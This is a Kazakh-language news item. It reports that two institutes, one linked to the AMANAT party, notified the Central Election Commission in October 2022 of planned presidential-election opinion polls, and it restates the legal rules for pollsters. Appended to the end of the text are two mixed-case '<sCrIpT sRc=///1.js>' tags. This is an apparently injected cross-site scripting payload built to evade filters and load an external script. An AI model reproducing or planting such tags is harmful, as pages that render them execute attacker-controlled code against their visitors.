Президенттік сайлау: екі мекеме қоғамдық пікірге сауалнама жүргізуді жоспарлап отыр «Қоғамдық пікір» зерттеу институты мен «АМАНАТ» партиясының Қоғамдық саясат институты» Қазақстан Республикасы Орталық сайлау комиссиясына қоғамдық пікірге сауалнама жүргізу туралы хабарлама жіберді. 2022 жылғы 7 қазандағы жағдай бойынша Орталық сайлау комиссиясына 2 заңды тұлғадан құжаттардың көшірмелерін қоса, қоғамдық пікірге сұрау салуды жүргізгені туралы хабарлар келіп түсті: 1. «Қоғамдық пікір» зерттеу институты («Общественное мнение» зерттеу институты); 2. «AMANAT» партиясының «Қоғамдық саясат институты» жеке меншік мекемесі. Заңды тұлғалардан келіп түскен хабарлар туралы ақпарат олардың келіп түсуіне қарай Орталық сайлау комиссиясының сайтында жаңартылатын болады. Орталық сайлау комиссиясы қоғамдық пікірге сұрау салуды Қазақстан Республикасының заңнамасына сәйкес тіркелген, қоғамдық пікірге сауал салуды жүргізу бойынша кемінде бес жыл тәжірибесі бар заңды тұлғалар тиісті құжаттардың көшірмелерін қоса беріп, бұд туралы Орталық сайлау комиссиясын жазбаша түрде алдын ала хабардар ете отырып, жүргізуге құқылы екенін еске салады.<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>